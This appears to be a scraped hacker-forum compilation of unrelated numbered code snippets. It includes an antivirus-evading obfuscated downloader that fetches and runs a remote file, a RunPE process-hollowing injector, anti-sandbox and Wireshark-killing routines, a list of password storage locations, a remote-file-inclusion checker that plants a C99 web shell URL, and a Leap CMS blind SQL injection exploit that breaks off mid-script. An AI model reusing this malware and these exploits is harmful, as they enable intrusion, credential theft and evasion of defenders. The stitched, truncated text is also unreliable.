sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-h" or arg.lower() == "-help": helpme() if arg.lower() == "-s" or arg.lower() == "-sitecollect": for site in sites: try: getsinglesitelist(site) except: print "Error :", site cleanup() proxylist = open(output, 'r').readlines() proxyvalidator(proxylist) if arg.lower() == "-m" or arg.lower() == "-multipage": getsamairdotru() cleanup() print "may take some time to print out good proxies, be patient" try: proxylist = open(output, 'r').readlines() proxyvalidator(proxylist) except: pass if arg.lower() == "-a" or arg.lower() == "-all": try: for site in sites: getsinglesitelist(site) getsamairdotru() cleanup() proxylist = open(output, 'r').readlines() proxyvalidator(proxylist) except: print "something went wront... using -a is seems a bit buggy" if arg.lower() == "-vl" or arg.lower() == "-validatelist": try: proxyfile = open(sys.argv[2], 'r').readlines() proxyvalidator(proxyfile) except(IndexError): print "Error: check you proxy file ...\n" sys.exit(0) print "\n+-[ANON LIST]-------------------------------------------------------------+\n" for anon_proxy in anon_list: try: haddr = gethostbyaddr(anon_proxy.split(':',1)[0]) except: haddr = '-' if nogeoip == 1: print anon_proxy.replace('\n',''),"\t| HostAdress:", haddr[0] pass elif nogeoip == 0: gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE) gx = gi.country_code_by_addr(anon_proxy.split(':',1)[0]) print anon_proxy.replace('\n',''), "\t| Country:", gx,"\t| HostAdress:", haddr[0] print "\n\t", len(anon_list), ": Total tested AnonProxies\n" print "+-[TRANS LIST]--------------------------------------------------------------+\n" for trans_proxy in trans_list: if nogeoip == 1: print trans_proxy.replace('\n','') pass elif nogeoip == 0: gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE) gx = gi.country_code_by_addr(trans_proxy.split(':',1)[0]) print trans_proxy.replace('\n',''), "\t| Country:", gx print "\n\t", len(trans_list), ": Total tested Transparent Proxies\n" print "+-[OTHER SERVERS]-----------------------------------------------------------+\n" if len(alivelist) > 16: print len(alivelist), "Alive but unverified Servers, check", output else: for alive in alivelist: if alive not in trans_list: if alive not in anon_list: print alive.replace('\n','') fileConst()
  14. Anti-Sandboxie: [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); private void DetectSandboxie() { if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) { // Sandboxie Detected // Code Here } } Anti-Emulation private void DetectEmulation() { long tickCount = Environment.TickCount; Thread.Sleep(500); long tickCount2 = Environment.TickCount; if (((tickCount2 - tickCount) < 500L)) { // Emulation Detected // Code Here } } Anti-Wireshark private void DetectWireshark() { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Equals("The Wireshark Network Analyzer")) { // Wireshark Detected // Code Here } } } Anti-WPE private void DetectWPE() { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Equals("WPE PRO")) { // WPE Detected // Code Here } } }
  15. Many people ask about the location in the Registry or file system that applications store the passwords. Here is a list of password storage locations for popular applications compiled by Nir Sofer. Be aware that even if you know the location of the saved password, it doesn’t mean that you can move it from one computer to another. many applications store the passwords in a way that you prevent from moving them to another computer or user profile. * Internet Explorer 4.00 – 6.00: The passwords are stored in a secret location in the Registry known as the “Protected Storage”. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”. You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted. Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys. * Internet Explorer 7.00 – 8.00: The new versions of Internet Explorer stores the passwords in 2 different locations. AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords. * Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version) These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name] Also, key3.db, located in the same folder, is used for encryption/decription of the passwords. * Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data (This filename is SQLite database which contains encrypted passwords and other stuff) * Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile * Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer. * Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer. * Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key of the account settings. The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index] If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers. * Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name] The account filename is an xml file with .oeaccount extension. * ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name] You should search a filename with .s extension. * Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name] * Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name] * MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations: 1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger 2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService 3. In the Credentials file, with entry named as “Passport.Net\\*”. (Only when the OS is XP or more) * MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name] * Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. * Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager (”EOptions string” value) * Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value. The value stored in “ETS” value cannot be recovered back to the original password. * AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name] * AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords * ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[iCQ Number] (MainLocation value) * ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[user Name]\Owner.mdb (Access Database) (The password hash cannot be recovered back to the original password) * Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat All other passwords are stored in Digsby servers. * PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].
  16. That's a simple web downloader. At the beginning the file has no API's except the kernel.dll, so the AV's can't find any dangerous code. Does only work on XP SP3 because the kernel.dll address changes every SP. .386 .model flat,stdcall option casemap:none .data ;Download strings file db "download.jpg",0 ;will be saved as url db "http://i33.tinypic.com/16ljles.jpg",0 ;url to file open db "open",0 ;crypted urlmon.dll and URLDownloadToFileA Api dll db "pwihjk+aii",0 api db "PWIAjrkijdaQjCli`D",0 ;crypted shell32.dll und ShellExecuteA Api dll2 db "vm`ii67+aii",0 api2 db "Vm`ii@}`fpq`D",0 .code start: ;Get size of the dll string push offset dll mov eax ,7C80BE46h call eax ;decrypt dll string mov ecx,eax mov edi,offset dll lp: mov al, byte ptr [edi] xor al,5 mov byte ptr [edi],al inc edi loop lp ;get size of the dll string push offset api mov eax ,7C80BE46h call eax ;decrypt dll string mov ecx,eax mov edi,offset api lp2: mov al, byte ptr [edi] xor al,5 mov byte ptr [edi],al inc edi loop lp2 ;loadlibrary getprocaddress to load urlmon.dll and with getprocaddress find the address from the api push offset dll mov eax,7C801D7Bh call eax push offset api push eax mov ebx,7C80AE30h call ebx ;execute urlmon push 0 push 0 push offset file push offset url push 0 call eax ;get size push offset dll2 mov eax ,7C80BE46h call eax ;decrypt mov ecx,eax mov edi,offset dll2 lp3: mov al, byte ptr [edi] xor al,5 mov byte ptr [edi],al inc edi loop lp3 ;get size push offset api2 mov eax ,7C80BE46h call eax ;decrypt mov ecx,eax mov edi,offset api2 lp4: mov al, byte ptr [edi] xor al,5 mov byte ptr [edi],al inc edi loop lp4 push offset dll2 mov eax,7C801D7Bh call eax push offset api2 push eax mov ebx,7C80AE30h call ebx ;execute shellexecute api push 5 push 0 push 0 push offset file push offset open push 0 call eax ;exitprocess push 0 mov eax,7C81CAFAh call eax end start
  17. [SECTION .text] global _start _start: jmp short ender starter: xor eax, eax xor ebx, ebx xor edx, edx inc ebx mov al,4 pop ecx ; eax = 4, ebx = 1, edx = len, ecx = pop mov dl, len int 0×80 xor eax, eax inc eax ; Quit the shellcode. int 0×80 ender: call starter db “hello shellcoder =)”,0×0a ; Call the message. len equ $-ender ; Sh0ck - shock@k.st [root@shock Desktop]# $ file=hello; od -An -j96 -N$(($(echo 0x$(readelf -t $file 2>&1 | awk ‘/.text/ {getline; print $4}’)))) -w$(($(echo 0x$(readelf -t $file 2>&1 | awk ‘/.text/ {getline; print $4}’)))) -tx1 $file | sed -e ’s| |\\x|g \xeb\x13\x31\xc0\x31\xdb\x31\xd2\x43\xb0\x04\x59\xb2\x19\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe8\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x72\x20\x3d\x29\x0a [root@shock Desktop]# $ file=hello; echo $(($(echo 0x$(readelf -t $file 2>&1 | awk ‘/.text/ {getline; print $4}’)))) 46 Bytes. Enjoy =)
  18. ; ================================================================ ; [ Anti-Wireshark ] ; Coded by Armaked0n of Macedonian Forces ; ---------------------------------------------------------------- ; Greetz: Darkness.MKD, Darker, Bra1n1aC, KnOppIx, Outlaw, Vertigo ; ================================================================ .386 .model flat, stdcall option casemap : none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib .data szWiresharkWinText CHAR 'The Wireshark Network Analyzer', NULL szWiresharkWinClass CHAR 'gdkWindowToplevel', NULL .code Start proc push TRUE call AntiWireshark push NULL call ExitProcess Start endp ; ================================================================================== ; AntiWireshark -> anti Wireshark procedure ; ---------------------------------------------------------------------------------- ; BOOL bKillWireshark ; Specifies whether the function should kill Wireshark if detected. TRUE specifies ; that this should be done, FALSE that the program should exit. ; ================================================================================== AntiWireshark proc bKillWireshark : BOOL push offset szWiresharkWinText push offset szWiresharkWinClass call FindWindow cmp eax, NULL jne @wireshark_detected ret @wireshark_detected: cmp dword ptr [bKillWireshark], FALSE jne @kill_wireshark push NULL call ExitProcess @kill_wireshark: push NULL push NULL push WM_CLOSE push eax call SendMessage ret AntiWireshark endp end Start
  19. comment ^ WebEXE originally by aphex ported by shapeless ^ .386 .model flat, stdcall option casemap: none include c:\masm32\include\windows.inc include c:\masm32\include\kernel32.inc include c:\masm32\include\masm32.inc includelib c:\masm32\lib\masm32.lib includelib c:\masm32\lib\kernel32.lib .data szFile db "calc.exe",0 .data? fHandle dword ? dwSize dword ? pBuff dword ? BytesRead dword ? ImageSize dword ? InjectMem dword ? pFileData dword ? HeaderSize dword ? szFileName byte 256 dup(?) contxt CONTEXT <> ProcInfo PROCESS_INFORMATION <> StartInfo STARTUPINFO <> .code comment ^ inline DWORD GetAlignedSize(DWORD Size, DWORD Alignment) { if( Size % Alignment == 0 ) return Size; return (((Size / Alignment) + 1) * Alignment); } ^ GetAligned proc uses ecx edx dSize:dword,Aligned:dword xor edx,edx mov eax,dSize mov ecx,Aligned div ecx cmp edx,0 jne @F mov eax,dSize ret @@: inc eax xor edx,edx mov ecx,Aligned mul ecx ret GetAligned endp __ep: invoke CreateFile,addr szFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0 mov fHandle,eax invoke GetFileSize,eax,0 mov dwSize,eax invoke VirtualAlloc,0,eax,MEM_COMMIT,PAGE_EXECUTE_READWRITE mov pBuff,eax invoke ReadFile,fHandle,eax,dwSize,addr BytesRead,0 mov eax,pBuff xchg eax,edi assume edi:ptr IMAGE_DOS_HEADER add edi,[edi].e_lfanew assume edi:ptr IMAGE_NT_HEADERS xor esi,esi mov si,[edi].FileHeader.SizeOfOptionalHeader lea eax,[edi].OptionalHeader add esi,eax assume esi:ptr IMAGE_SECTION_HEADER push [edi].OptionalHeader.SizeOfHeaders pop HeaderSize invoke GetAligned,[edi].OptionalHeader.SizeOfHeaders,[edi].OptionalHeader.SectionAlignment mov ImageSize,eax ; save this value push eax ; save esi push esi mov dx,[edi].FileHeader.NumberOfSections @@: cmp [esi].Misc.VirtualSize,0 je lZero invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment add ImageSize,eax lZero: mov eax,HeaderSize cmp eax,[esi].PointerToRawData jbe lNotSmaller push [esi].PointerToRawData pop HeaderSize lNotSmaller: ; next item! add esi,SizeOf IMAGE_SECTION_HEADER dec dx jnz @B ; restore esi! pop esi invoke VirtualAlloc,0,ImageSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE mov InjectMem,eax mov pFileData,eax invoke RtlMoveMemory,eax,pBuff,HeaderSize ; restore original headersize pop eax add pFileData,eax mov dx,[edi].FileHeader.NumberOfSections @@: mov eax,[esi].SizeOfRawData cmp eax,0 jbe lBelowOrZero cmp eax,[esi].Misc.VirtualSize jbe lBelowOrZero2 mov eax,[esi].Misc.VirtualSize lBelowOrZero2: mov ecx,pBuff add ecx,[esi].PointerToRawData ; save the counter value! push edx invoke RtlMoveMemory,pFileData,ecx,eax pop edx invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment add pFileData,eax jmp lContinue lBelowOrZero: ; it wasnt above 0 cmp [esi].Misc.VirtualSize,0 je lContinue invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment add pFileData,eax lContinue: ; next item! add esi,SizeOf IMAGE_SECTION_HEADER dec dx jnz @B invoke RtlZeroMemory,addr contxt,SizeOf CONTEXT invoke RtlZeroMemory,addr StartInfo,SizeOf STARTUPINFO invoke GetModuleFileName,0,addr szFileName,SizeOf szFileName invoke CreateProcess,0,addr szFileName,0,0,0,CREATE_SUSPENDED,0,0,addr StartInfo,addr ProcInfo mov contxt.ContextFlags,CONTEXT_FULL invoke GetThreadContext,ProcInfo.hThread,addr contxt invoke VirtualAllocEx,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,ImageSize,MEM_RESERVE or MEM_COMMIT,PAGE_EXECUTE_READWRITE invoke WriteProcessMemory,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,InjectMem,ImageSize,addr BytesRead mov eax,contxt.regEbx add eax,8 lea ecx,[edi].OptionalHeader.ImageBase invoke WriteProcessMemory,ProcInfo.hProcess,eax,ecx,4,addr BytesRead push [edi].OptionalHeader.ImageBase pop eax add eax,[edi].OptionalHeader.AddressOfEntryPoint mov contxt.regEax,eax invoke SetThreadContext,ProcInfo.hThread,addr contxt invoke ResumeThread,ProcInfo.hThread invoke VirtualFree,InjectMem,0,MEM_RELEASE invoke VirtualFree,pBuff,0,MEM_RELEASE invoke CloseHandle,fHandle ret end __ep
  20. faza posted this, its basic but can come in handy if you need a quick hash or string encoding/decoding performed on irc. (hex/base64/md5/sha/sha224/sha512/sha256/sha384/url) !comm for commands. #!/usr/bin/python #Hash Irc Bot import socket, md5, base64, urllib, hashlib, sha #Config################ ircserv = raw_input(u'server: ') port = 6667 chan = raw_input(u'channel: ') nick = raw_input(u'bot nick: ') readbuffer = "" ##################### irc = socket.socket (socket.AF_INET, socket.SOCK_STREAM ) try: irc.connect((ircserv, port)) except: print 'error!' print irc.recv(4096) irc.send('NICK '+nick+'\r\n') irc.send('USER ' +(nick+' ')*3+' :Python IRC\r\n') req=irc.recv(768) #irc.send ('PONG :'+req.replace('PING :','')) print 'PING? PONG!' irc.send ('JOIN '+chan+'\r\n') while 1: readbuffer=readbuffer+irc.recv(10240) temp=str.split(readbuffer, "\n") readbuffer=temp.pop( ) for line1 in temp: line1=str.rstrip(line1) if line1.find("!quit ")>0: irc.send ('QUIT '+ line1.split('!quit ')[1]+'\r\n') print 'bot quit' if line1.find("!comm")>0: irc.send ('PRIVMSG '+ chan + ' :!hex, !unhex, !b64, !unb64, !md5, !sha, !sha224, !sha512, !sha256, !sha384, !url, !unurl, !hash\r\n') print 'function !comm' if line1.find("!md5 ")>0: irc.send ('PRIVMSG ' + chan + ' :md5: '+ md5.new(line1.split('!md5 ')[1]).hexdigest()+'\r\n') print 'function !md5' if line1.find("!hex ")>0: irc.send ('PRIVMSG ' + chan + ' :hex: 0x'+ base64.binascii.hexlify(line1.split('!hex ')[1]) + '\r\n') print 'function !hex' if line1.find("!b64 ")>0: irc.send ('PRIVMSG ' + chan + ' :base64: '+ base64.binascii.b2a_base64(line1.split('!b64 ')[1]) + '\r\n') print 'function !b64' if line1.find("!url ")>0: irc.send ('PRIVMSG ' + chan + ' :url: '+ urllib.quote(line1.split('!url ')[1]) + '\r\n') print 'function !url' if line1.find("!unurl ")>0: irc.send ('PRIVMSG ' + chan + ' :unurl: '+ urllib.unquote(line1.split('!unurl ')[1]) + '\r\n') print 'function !unurl' if line1.find("!unb64 ")>0: irc.send ('PRIVMSG ' + chan + ' :unbase64: '+ base64.binascii.a2b_base64(line1.split('!unb64 ')[1]) + '\r\n') print 'function !unb64' if line1.find("!unhex ")>0: irc.send ('PRIVMSG ' + chan + ' :unhex: '+ base64.binascii.unhexlify(line1.split('!unhex 0x')[1]) + '\r\n') print 'function !unhex' if line1.find("!sha ")>0: irc.send ('PRIVMSG ' + chan + ' :sha-1: '+ sha.new(line1.split('!sha ')[1]).hexdigest() + '\r\n') print 'function !sha' if line1.find("!sha224 ")>0: irc.send ('PRIVMSG ' + chan + ' :sha-224: '+ hashlib.sha224(line1.split('!sha224 ')[1]).hexdigest() + '\r\n') print 'function !sha224' if line1.find("!sha256 ")>0: irc.send ('PRIVMSG ' + chan + ' :sha-256: '+ hashlib.sha256(line1.split('!sha256 ')[1]).hexdigest() + '\r\n') print 'function !sha256' if line1.find("!sha384 ")>0: irc.send ('PRIVMSG ' + chan + ' :sha-384: '+ hashlib.sha384(line1.split('!sha384 ')[1]).hexdigest() + '\r\n') print 'function !sha384' if line1.find("!sha512 ")>0: irc.send ('PRIVMSG ' + chan + ' :sha-512: '+ hashlib.sha512(line1.split('!sha512 ')[1]).hexdigest() + '\r\n') print 'function !sha512' if line1.find("!hash ")>0: print 'function !hash' go=line1.split('!hash ')[1] if len(go)==32: irc.send ('PRIVMSG ' + chan + ' :hash type: MD5/MSCash/MD2/MD4/Haval128/NTLM/RipeMD128\r\n') if go.find('==') != -1: irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(Base64)\r\n') if go.find('$1$$') != -1: irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(Unix)\r\n') if go.find('$apr1$$') != -1: irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(APR)\r\n') if len(go)==16: irc.send ('PRIVMSG ' + chan + ' :hash type: MySQL\r\n') if len(go)==40: irc.send ('PRIVMSG ' + chan + ' :hash type: MySQL5/SHA-1\r\n') if len(go)==13: irc.send ('PRIVMSG ' + chan + ' :hash type: DES(Unix)\r\n') if len(go)==28: irc.send ('PRIVMSG ' + chan + ' :hash type: SHA-1(Base64)\r\n') if len(go)==8: irc.send ('PRIVMSG ' + chan + ' :hash type: ADLER32/CRC-32\r\n') if len(go)<=5: irc.send ('PRIVMSG ' + chan + ' :error!\r\n')
  21. This tool was designed to better learn perl and test a very large RFI list Usage: perl perl_verf.pl [!] RFI File: rfi.txt [!] Shell Path: http://www.root-the.net/shell.txt?? [!] Shell String: C99Shell [!] Output File: good_rfis.txt [~] Verifying... [+] www.site.com/rfi.php=http://www.root-the.net/shell.txt?? #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; print q( +++++++++++++++++++++ + PERL RFI VERIFIER + + BY R3V3RS3 + +++++++++++++++++++++ ); $good = 0; $total = 0; print "[!] RFI File: "; chop ($rfi = <STDIN>); print "[!] Shell Path: "; chop ($shell = <STDIN>); print "[!] Shell String: "; chop ($shellstring = <STDIN>); print "[!] Output File: "; chop ($outfile = <STDIN>); print "[~] Verifying...\n\n"; open("rfi") or die("Could not open log file."); foreach $line (<rfi>) { chomp($line); my $site = $line.$shell; my $w = HTTP::Request->new(GET=>$site); my $ua = LWP::UserAgent->new(); my $an = $ua->request($w); $total += 1; if($an->content =~ $shellstring) { open(DAT,">>$outfile") || die("Cannot Open File"); print DAT "$site\n"; close(DAT); print "[+] $site\n"; $good += 1; }else{} } open(DAT,">>$outfile") || die("Cannot Open File"); print DAT ">> DONE SCANNING <<"; close(DAT); print "\n[~] Verifying Complete.\n"; print "[~] Stats: $good / $total\n";
  22. #!/usr/bin/perl # rembawz.pl - IRC OPBot # [7ru31337 - if j00 us3 th1z u'z a 7ru3 bl4c|< h4t h4><0rZZ] # by RingZero # www.rem0te.org $nick = 'RemB4WZ'; # Nickname che apparia' $ircd = 'irc.azzurra.org'; # Server IRC $chan = '#rembawz'; # Chan IRC $pass = 'pwdzdelbotasd'; # Password del BOT (per i comandi) $upwd = ''; # Password del NickServ use IO::Socket; $sock = new IO::Socket::INET ( PeerAddr => $ircd, PeerPort => 6667, Proto => 'tcp' ) || "Impossibile connettersi a $ircd\n"; banner(); print $sock "NICK $nick\r\n"; print $sock "USER roflcopter 8 * :rem0te.org\r\n"; #print $sock "PRIVMSG NickServ :IDENTIFY $nick $upwd\r\n"; print $sock "JOIN $chan\r\n"; while($recv = <$sock>) { if ($recv =~ /PRIVMSG $nick :!op (.*?) $pass/) { print $sock "MODE $chan +o $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!deop (.*?) $pass/) { print $sock "MODE $chan -o $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!hop (.*?) $pass/) { print $sock "MODE $chan +h $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!dehop (.*?) $pass/){ print $sock "MODE $chan -h $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!v (.*?) $pass/) { print $sock "MODE $chan +v $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!dev (.*?) $pass/) { print $sock "MODE $chan -v $1\r\n"; } if ($recv =~ /PRIVMSG $nick :!kick (.*?) $pass/) { print $sock "KICK $chan $1 GTFO\r\n"; } if ($recv =~ /PRIVMSG $nick :!kill $pass/) { print $sock "PRIVMSG $chan :Addio stronzi di $chan\r\n"; print $sock "QUIT\r\n"; } if ($recv =~ /PRIVMSG $nick :!ren (.*?) $pass/) { print $sock "NICK $1\r\n"; } if ($recv =~ /:(.*?)!(.*?) JOIN :$chan/) { print $sock "PRIVMSG $chan :$1, benvenuto su $chan\r\n"; } if ($recv =~ /PING .*?)/) { print $sock "PONG :$1\r\n"; } } sub banner() { print q { __ _____ .----.-----.--------.| |--.| | |.--.--.--.-----. | _| -__| || _ ||__ | | | |-- __| |__| |_____|__|__|__||_____| |__||________|_____| }; }
  23. #!/usr/bin/perl #----------------------------------------------- #BLIND SQL INJECTION--Leap CMS 0.1.4--> #----------------------------------------------- # # CMS INFORMATION: # #-->WEB: http://leap.gowondesigns.com/ #-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap #-->CATEGORY: CMS / Lite #-->DESCRIPTION: Leap is a single file, template independent, open-source, # standards-compliant,extensible content management system for the web... #-->RELEASED: 2009-03-13 # # CMS VULNERABILITY: # #-->TESTED ON: firefox 3 and I-Explorer 6 #-->DORK: "Powered by Leap" #-->CATEGORY: BLIND SQL INJECTION EXPLOIT #-->AFFECT VERSION: 0.1.4 (maybe <= ?) #-->Discovered Bug date: 2009-04-24 #-->Reported Bug date: 2009-04-24 #-->Fixed bug date: Not fixed #-->Info patch: Not fixed #-->Author: YEnH4ckEr #-->mail: y3nh4ck3r[at]gmail[dot]com #-->WEB/BLOG: N/A #-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # #----------- #BUG FILE: #----------- # #Path --> [HOME_PATH]/leap.php # # # #function contentSearch() { # # ... # # #if($searchterm=='') return FALSE; # # ... # # if (eregi(" AND | NOT | OR ",$search,$matches)) $search=str_replace($matches,'',$search); <-------BYPASSED (/**/) # # $keywords = explode(' ', $search); //print_r($keywords); <---------BYPASSED (/**/) # # ... # # $query = "SELECT * FROM ".db('prefix')."content WHERE published='1' AND"; <----------START QUERY # # if ($keyCount > 1) { # # ... # # } # else { # # $query .=" (INSTR(`title`, '$keywords[0]') > '0' || INSTR(`body`, '$keywords[0]') > '0' || ...)";} <--------INJECTION HERE # $pquery=$query.';'; $query.=" ORDER BY mod_date DESC LIMIT $pg, $max;"; //echo $query; # # ... # # } # #} # #------------ #CONDITIONS: #------------ # #**gpc_magic_quotes=off # #--------------------------------------- #PROOF OF CONCEPT (BLIND SQL INJECTION): #--------------------------------------- # #SEARCH --> a')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/1=1# # #Return: Search for 'a' # ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### ####################################################################### # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Leap CMS 0.1.4 (BLIND SQL Injection) Exploit"); system ("color 04"); } } sub request { my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $request = HTTP::Request -> new(POST => $_[0]); $request->content_type('application/x-www-form-urlencoded'); $request->content($_[1]); my $outcode= $userag->request($request)->as_string; return $outcode; } sub helper { print "\n\t[<-->] Leap CMS 0.1.4 - (BLIND SQL Injection) Exploit\n"; print "\t[<-->] USAGE MODE: [<-->]\n"; print "\t[<-->] perl $0 [HOST] [PATH] [Search] [Id]\n"; print "\t[<-->] [HOST]: Web.\n"; print "\t[<-->] [PATH]: Home Path.\n"; print "\t[<-->] [Search]: Something. Default: a (**optional)\n"; print "\t[<-->] [id]: Id user. Default: 1 (**optional)\n"; print "\t[<-->] Example: perl $0 'www.example.es' 'leap-CMS' 'a' '1'\n"; } sub lengthuser{ #First, user length... $exit=0; $i=0; while($exit==0){ my $searchinjected="searchterm=".$_[2]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/length(mail)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id=".$_[1].")=".$i++."#"; #injected code $output=&request($_[0],$searchinjected); if ( $output =~ (/No Results Found./)) { $exit=0; }else{ $exit=1; } } #Save column length $lengthuser=$i-1; print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tUser Length catched!\n"; print "\tUser Length: ".$lengthuser."\n"; print "\tBruteforcing values...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; return $lengthuser; } sub bruteforcing { my $values=""; #Getting datas $j=1; $i=46; while(($j<=$_[2]) && ($i<=126)){ my $searchinjected="searchterm=".$_[4]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/ascii(substring((SELECT/*y3nh4ck3r*/".$_[3]."/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id='".$_[1]."'),".$j.",1))=".$i."#"; #injected code $output=&request($_[0],$searchinjected); if ( $output !~ (/No Results Found./)) { $values=$values.chr($i); $j++; $i=45; } if($i==57) { $i=63; #@ } if($i==64) { $i=96; } #new char $i++; } #Error if(($i>127) || ($j>$_[2])){ if(!$values){ print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tEXPLOIT FAILED!\n"; print "\tFatal error: Datas doesn't find!\n"; print "\tCause: Maybe you have to include more characters on bruteforcing...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; exit(1); } } return $values; } #Main &lw; print "\t\t#######################################################\n\n"; print "\t\t#######################################################\n\n"; print "\t\t## Leap CMS 0.1.4 - (BLIND SQL Injection) Exploit ##\n\n"; print "\t\t## ++Conditions: Need magic_quotes=off ##\n\n"; print "\t\t## Author: Y3nh4ck3r ##\n\n"; print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n"; print "\t\t## Proud to be Spanish! ##\n\n"; print "\t\t#######################################################\n\n"; print "\t\t#######################################################\n\n"; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; #Build the uri my $finalhost="http://".$host."/".$path."/index.php?search"; #Check all variables needed $numArgs = $#ARGV + 1; if($numArgs<=1) { &helper; exit(1); } #Search parameter. It's optional. Default:a if(!$ARGV[2]){ $search="a"; }else{ $search=$ARGV[2]; } #Id-user is optional.Default:1 if(!$ARGV[3]){ $idhacked="1"; }else{ $idhacked=$ARGV[3]; } #Testing blind sql injection my $finalrequest = $finalhost; #Test blind sql injection my 